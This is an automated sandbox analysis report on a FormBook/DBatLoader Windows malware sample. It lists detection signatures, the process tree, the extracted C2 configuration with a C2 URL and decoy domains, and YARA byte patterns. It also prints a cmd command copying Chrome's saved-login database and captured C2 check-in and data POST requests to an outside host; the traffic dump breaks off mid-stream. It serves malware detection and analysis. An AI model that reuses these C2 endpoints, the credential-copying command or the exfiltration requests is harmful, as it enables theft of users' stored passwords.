Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report WZ454554.exe

Overview

General Information

Sample Name:WZ454554.exe
Analysis ID:552851
MD5:58b39c2620cdda3d3fa6a125f476fc9f
SHA1:5d2672c79e9dffb2cdeee0d00e406c03c762985c
SHA256:fdf39d043cc55d6a72b1fe01c9067bb7591d5c379798499148521e6158afeea0
Tags:exeformbook
Infos:

Most interesting Screenshot:

Detection

FormBook DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected DBatLoader
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • WZ454554.exe (PID: 6628 cmdline: "C:\Users\user\Desktop\WZ454554.exe" MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
    • WZ454554.exe (PID: 6936 cmdline: C:\Users\user\Desktop\WZ454554.exe MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Hyrzbcwcas.exe (PID: 1840 cmdline: "C:\Users\user\Contacts\Hyrzbcwcas.exe" MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
          • Hyrzbcwcas.exe (PID: 5708 cmdline: C:\Users\user\Contacts\Hyrzbcwcas.exe MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
        • Hyrzbcwcas.exe (PID: 7108 cmdline: "C:\Users\user\Contacts\Hyrzbcwcas.exe" MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
          • Hyrzbcwcas.exe (PID: 6340 cmdline: C:\Users\user\Contacts\Hyrzbcwcas.exe MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
        • help.exe (PID: 6656 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
          • cmd.exe (PID: 4324 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 5628 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • help.exe (PID: 5832 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.spiegelpherese.com/m9g2/"], "decoy": ["pubgnewstatedl.com", "guidedwaveradar.com", "onlineexitpoll.com", "mutationdesign.com", "p60p.com", "xhcaijing.com", "skpcart.store", "houseathomes.com", "thenorthdale.com", "kvkkkararozetleri.com", "formecondominium.com", "7808lll.com", "mitchfletcher.com", "thatsawrapfl.com", "glrinternationalfzco.com", "dbmxkgek.com", "feelingfancy.com", "nishieihuku.com", "newearthhg.com", "tenlog040.xyz", "savche.xyz", "solarofoundation.com", "sk8.network", "schooljoy.net", "ioannismitsialisgerman.online", "hooklinen.com", "gorgeousingems.com", "directusimmigration.com", "nexxt.info", "itecsecure.com", "chairsexpert.com", "yandex-check.online", "ivdripspace.com", "sentlogisticsja.com", "mdk-clothing.com", "quick2repair.net", "thisflippingfamily.com", "lu-dra.xyz", "degenape.art", "evodiocese2022scm.com", "churchofrocknroll.com", "visionaryblock.com", "jornalonlinealagoas.com", "rainbow-of-light.com", "oblical.com", "preserveliqueur.com", "morbidthings.com", "panoramaregency.com", "iphone13promax.review", "gongyingmi.com", "xqzs72.com", "sgmoda.com", "boogiereaper.com", "bitesofwellness.online", "backdad.com", "freeimperia.com", "senerants.tech", "029yu.xyz", "dhakhtar.net", "cnclighting.com", "iplmatchwinner.com", "thpt.space", "naris.net", "hamgirls.com"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
WZ454554.exeJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Contacts\sacwcbzryH.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
    • 0x58:$hotkey: \x0AHotKey=3
    • 0x0:$url_explicit: [InternetShortcut]
    C:\Users\user\Contacts\sacwcbzryH.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
    • 0x14:$file: URL=
    • 0x0:$url_explicit: [InternetShortcut]
    C:\Users\user\Contacts\Hyrzbcwcas.exeJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000015.00000000.416006494.0000000000401000.00000020.00020000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
        0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
          0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x16b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x11a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x17b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x192f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x41c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x78f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x890a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x4819:$sqlite3step: 68 34 1C 7B E1
          • 0x492c:$sqlite3step: 68 34 1C 7B E1
          • 0x4848:$sqlite3text: 68 38 2A 90 C5
          • 0x496d:$sqlite3text: 68 38 2A 90 C5
          • 0x485b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x4983:$sqlite3blob: 68 53 D8 7F 8C
          00000009.00000000.323155523.0000000000401000.00000020.00020000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
            Click to see the 86 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            21.1.Hyrzbcwcas.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
              21.1.Hyrzbcwcas.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
              • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
              • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
              • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
              • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
              • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
              • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
              • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
              • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
              • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
              • 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
              21.1.Hyrzbcwcas.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
              • 0x18819:$sqlite3step: 68 34 1C 7B E1
              • 0x1892c:$sqlite3step: 68 34 1C 7B E1
              • 0x18848:$sqlite3text: 68 38 2A 90 C5
              • 0x1896d:$sqlite3text: 68 38 2A 90 C5
              • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
              • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
              17.2.Hyrzbcwcas.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
                17.2.Hyrzbcwcas.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
                • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
                • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
                • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
                • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
                • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
                • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
                • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
                • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
                • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
                • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
                • 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
                Click to see the 67 entries

                Sigma Overview

                No Sigma rule has matched

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.spiegelpherese.com/m9g2/"], "decoy": ["pubgnewstatedl.com", "guidedwaveradar.com", "onlineexitpoll.com", "mutationdesign.com", "p60p.com", "xhcaijing.com", "skpcart.store", "houseathomes.com", "thenorthdale.com", "kvkkkararozetleri.com", "formecondominium.com", "7808lll.com", "mitchfletcher.com", "thatsawrapfl.com", "glrinternationalfzco.com", "dbmxkgek.com", "feelingfancy.com", "nishieihuku.com", "newearthhg.com", "tenlog040.xyz", "savche.xyz", "solarofoundation.com", "sk8.network", "schooljoy.net", "ioannismitsialisgerman.online", "hooklinen.com", "gorgeousingems.com", "directusimmigration.com", "nexxt.info", "itecsecure.com", "chairsexpert.com", "yandex-check.online", "ivdripspace.com", "sentlogisticsja.com", "mdk-clothing.com", "quick2repair.net", "thisflippingfamily.com", "lu-dra.xyz", "degenape.art", "evodiocese2022scm.com", "churchofrocknroll.com", "visionaryblock.com", "jornalonlinealagoas.com", "rainbow-of-light.com", "oblical.com", "preserveliqueur.com", "morbidthings.com", "panoramaregency.com", "iphone13promax.review", "gongyingmi.com", "xqzs72.com", "sgmoda.com", "boogiereaper.com", "bitesofwellness.online", "backdad.com", "freeimperia.com", "senerants.tech", "029yu.xyz", "dhakhtar.net", "cnclighting.com", "iplmatchwinner.com", "thpt.space", "naris.net", "hamgirls.com"]}
                Multi AV Scanner detection for submitted fileShow sources
                Source: WZ454554.exeVirustotal: Detection: 22%Perma Link
                Source: WZ454554.exeReversingLabs: Detection: 39%
                Yara detected FormBookShow sources
                Source: Yara matchFile source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.0.WZ454554.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.1.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.0.WZ454554.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.1.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000000.324007988.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.399621636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.436845866.00000000008C0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000001.400349591.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000001.324511598.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.436315053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.400048444.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.407725220.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.429108861.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.437292259.0000000002AD0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.559355148.0000000003070000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000001.419503342.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000000.324380363.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.431106841.0000000003000000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeReversingLabs: Detection: 39%
                Source: 9.2.WZ454554.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 17.1.Hyrzbcwcas.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 21.1.Hyrzbcwcas.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 21.2.Hyrzbcwcas.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 17.2.Hyrzbcwcas.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 9.1.WZ454554.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: WZ454554.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49746 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49750 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49751 version: TLS 1.2
                Source: Binary string: wntdll.pdbUGP source: WZ454554.exe, 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, WZ454554.exe, 00000009.00000002.409087872.0000000000BAF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000011.00000002.429687044.0000000000B5F000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, help.exe, 00000014.00000002.559731759.00000000031E0000.00000040.00000001.sdmp, help.exe, 00000014.00000002.560116485.00000000032FF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437079630.0000000000980000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000003.420862619.00000000007E0000.00000004.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437691847.0000000000A9F000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.431480106.00000000037E0000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.433718675.00000000038FF000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437536905.00000000033C0000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437717560.00000000034DF000.00000040.00000001.sdmp
                Source: Binary string: cmd.pdbUGP source: Hyrzbcwcas.exe, 00000011.00000002.432784499.0000000000DD0000.00000040.00020000.sdmp, cmd.exe, 00000019.00000000.427671130.0000000000D80000.00000040.00020000.sdmp, cmd.exe, 00000019.00000002.430750073.0000000000D80000.00000040.00020000.sdmp
                Source: Binary string: wntdll.pdb source: WZ454554.exe, WZ454554.exe, 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, WZ454554.exe, 00000009.00000002.409087872.0000000000BAF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, Hyrzbcwcas.exe, 00000011.00000002.429687044.0000000000B5F000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000011.00000002.429448664.0000000000A40000.00000040.00000001.sdmp, help.exe, 00000014.00000002.559731759.00000000031E0000.00000040.00000001.sdmp, help.exe, 00000014.00000002.560116485.00000000032FF000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437079630.0000000000980000.00000040.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000003.420862619.00000000007E0000.00000004.00000001.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437691847.0000000000A9F000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.431480106.00000000037E0000.00000040.00000001.sdmp, cmd.exe, 00000019.00000002.433718675.00000000038FF000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437536905.00000000033C0000.00000040.00000001.sdmp, help.exe, 0000001C.00000002.437717560.00000000034DF000.00000040.00000001.sdmp
                Source: Binary string: help.pdbGCTL source: WZ454554.exe, 00000009.00000002.408113212.0000000000659000.00000004.00000020.sdmp, WZ454554.exe, 00000009.00000002.413836751.0000000002A50000.00000040.00020000.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437020676.0000000000950000.00000040.00020000.sdmp
                Source: Binary string: help.pdb source: WZ454554.exe, 00000009.00000002.408113212.0000000000659000.00000004.00000020.sdmp, WZ454554.exe, 00000009.00000002.413836751.0000000002A50000.00000040.00020000.sdmp, Hyrzbcwcas.exe, 00000015.00000002.437020676.0000000000950000.00000040.00020000.sdmp
                Source: Binary string: cmd.pdb source: Hyrzbcwcas.exe, 00000011.00000002.432784499.0000000000DD0000.00000040.00020000.sdmp, cmd.exe, 00000019.00000000.427671130.0000000000D80000.00000040.00020000.sdmp, cmd.exe, 00000019.00000002.430750073.0000000000D80000.00000040.00020000.sdmp
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 4x nop then pop esi9_2_004172E0
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 4x nop then pop esi9_2_004172F4
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 4x nop then pop ebx9_2_00407B1A
                Source: C:\Users\user\Desktop\WZ454554.exeCode function: 4x nop then pop edi9_2_00416CB1
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 4x nop then pop esi17_2_004172E0
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 4x nop then pop esi17_2_004172F4
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 4x nop then pop ebx17_2_00407B1A
                Source: C:\Users\user\Contacts\Hyrzbcwcas.exeCode function: 4x nop then pop edi17_2_00416CB1

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 34.102.136.180:80
                Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 34.102.136.180:80
                Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 34.102.136.180:80
                System process connects to network (likely due to code injection or exploit)Show sources
                Source: C:\Windows\explorer.exeDomain query: www.sentlogisticsja.com
                Source: C:\Windows\explorer.exeDomain query: www.senerants.tech
                Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: www.spiegelpherese.com/m9g2/
                Source: global trafficHTTP traffic detected: GET /m9g2/?xXV=6l9PRhy0D4S&GvW=sz5ErymDSipaI2rGHMiHzQDn8335WrDZWT7fmGUTYuWWeT2KiLBKARdoGEtcQCocu9tS HTTP/1.1Host: www.sentlogisticsja.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: global trafficHTTP traffic detected: POST /m9g2/ HTTP/1.1Host: www.sentlogisticsja.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.sentlogisticsja.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sentlogisticsja.com/m9g2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 76 57 3d 6b 52 31 2d 31 57 32 49 66 69 6b 71 56 31 57 2d 65 70 48 42 74 33 28 62 72 55 7a 4b 55 37 33 73 55 55 72 5a 7a 31 55 56 52 74 43 71 61 41 53 53 76 4c 49 55 4f 46 51 61 65 42 4e 34 4d 68 41 52 73 4f 41 4e 32 5a 52 39 72 4c 6a 76 46 4f 65 52 46 6a 6b 6a 32 5f 78 41 44 55 76 5f 67 61 55 64 54 64 53 59 47 77 28 45 41 42 54 74 71 33 73 61 48 7a 5a 54 36 72 5a 53 47 39 4f 6f 6e 51 71 68 52 73 7e 70 63 52 32 34 57 62 6b 79 70 30 32 75 31 4a 4b 49 48 32 47 75 49 6d 5a 42 45 49 42 74 61 79 54 46 49 6a 33 63 31 39 44 6a 6c 72 69 58 6e 45 52 30 61 62 48 7a 61 32 4a 42 79 74 59 6b 4b 6a 50 4c 66 5a 50 74 35 68 79 6a 51 47 32 62 32 64 61 66 6f 49 51 65 4a 4c 59 4e 28 71 59 6b 47 6a 77 35 49 54 4c 4d 51 6f 68 35 4d 77 72 4e 42 63 6b 72 6d 49 34 4c 4e 6c 7e 59 6e 59 6d 34 6c 7a 58 43 6e 37 38 4b 28 36 54 5a 49 30 76 32 5a 74 47 5a 70 67 72 2d 32 38 57 6a 77 61 77 68 50 35 6c 4e 45 6f 42 6b 36 50 4c 78 66 6c 62 49 37 4a 38 73 39 2d 63 6e 51 77 32 53 69 4f 64 59 46 77 28 45 4c 4e 48 75 57 51 45 34 62 69 4d 5a 46 77 54 7a 52 73 4f 52 73 75 76 4a 28 7a 78 46 4d 48 64 37 34 75 39 6c 6c 32 4f 66 71 44 59 78 4b 64 57 51 45 68 30 4a 6e 42 4a 63 69 70 4e 4f 78 37 4d 41 28 71 41 42 49 78 76 76 72 49 6b 4e 6c 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: GvW=kR1-1W2IfikqV1W-epHBt3(brUzKU73sUUrZz1UVRtCqaASSvLIUOFQaeBN4MhARsOAN2ZR9rLjvFOeRFjkj2_xADUv_gaUdTdSYGw(EABTtq3saHzZT6rZSG9OonQqhRs~pcR24Wbkyp02u1JKIH2GuImZBEIBtayTFIj3c19DjlriXnER0abHza2JBytYkKjPLfZPt5hyjQG2b2dafoIQeJLYN(qYkGjw5ITLMQoh5MwrNBckrmI4LNl~YnYm4lzXCn78K(6TZI0v2ZtGZpgr-28WjwawhP5lNEoBk6PLxflbI7J8s9-cnQw2SiOdYFw(ELNHuWQE4biMZFwTzRsORsuvJ(zxFMHd74u9ll2OfqDYxKdWQEh0JnBJcipNOx7MA(qABIxvvrIkNlQ).
                Source: global trafficHTTP traffic detected: POST /m9g2/ HTTP/1.1Host: www.sentlogisticsja.comConnection: closeContent-Length: 149769Cache-Control: no-cacheOrigin: http://www.sentlogisticsja.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sentlogisticsja.com/m9g2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 76 57 3d 6b 52 31 2d 31 57 43 36 50 43 78 73 52 48 79 37 66 35 58 5a 6e 58 4f 43 36 46 54 56 64 49 6e 53 4f 44 61 65 7a 30 6b 52 65 4f 4b 43 51 41 69 53 6e 70 52 64 44 46 51 5a 59 42 4e 5f 61 52 63 74 79 73 51 37 32 64 68 48 72 4c 62 73 50 76 75 51 46 7a 6c 72 32 66 39 38 46 55 37 76 67 63 55 34 53 34 43 2d 4e 51 37 45 5a 78 37 72 76 6b 6b 52 47 32 70 51 34 62 46 58 45 39 57 78 6e 6a 76 42 53 4a 7e 4c 62 51 61 2d 52 74 6b 44 6d 58 28 78 78 65 75 4d 4a 47 36 74 48 46 6c 53 4b 4c 6c 70 66 33 7a 37 55 78 66 66 72 39 72 6c 67 73 48 71 6a 32 39 6e 59 4c 33 42 61 33 4d 38 71 4c 78 36 59 51 37 54 51 49 44 58 32 30 57 6c 63 56 4f 54 79 66 43 69 71 4c 49 68 4c 4f 6b 53 37 36 46 6b 46 68 59 70 4d 33 6e 6e 57 5a 74 39 5a 53 44 44 41 76 49 6a 7e 34 6f 30 45 48 65 31 74 73 72 33 78 51 37 57 70 37 38 68 7a 61 54 56 51 32 33 4f 4f 36 65 43 6f 67 61 5a 71 2d 33 35 36 70 45 6c 4f 4e 5a 56 42 4c 52 6c 34 66 58 74 51 30 72 77 78 61 51 6c 37 63 41 44 55 77 32 50 6d 4e 31 54 46 77 7e 39 4c 50 75 35 58 68 67 34 62 7a 74 44 49 7a 4c 4a 41 38 4f 51 70 2d 28 4c 6d 77 5a 56 4d 48 46 37 35 62 59 74 33 56 65 66 74 56 63 79 4a 35 43 51 58 42 30 4a 71 68 4a 43 79 4a 67 34 7a 34 63 32 74 4b 67 5a 66 47 65 6f 71 70 42 37 6e 47 67 4e 54 35 44 53 5a 47 52 4f 74 61 4f 79 74 44 41 6d 53 50 71 64 68 65 75 44 4f 46 59 39 49 59 79 48 45 65 4b 2d 7e 73 7e 6a 59 33 4a 5f 48 64 62 68 6e 61 74 45 75 32 59 64 53 5a 47 79 6e 4e 35 55 76 4a 6a 48 4e 78 42 54 45 48 72 71 63 73 68 61 75 42 6d 6e 59 74 4a 73 45 4e 49 2d 64 45 6e 2d 69 6f 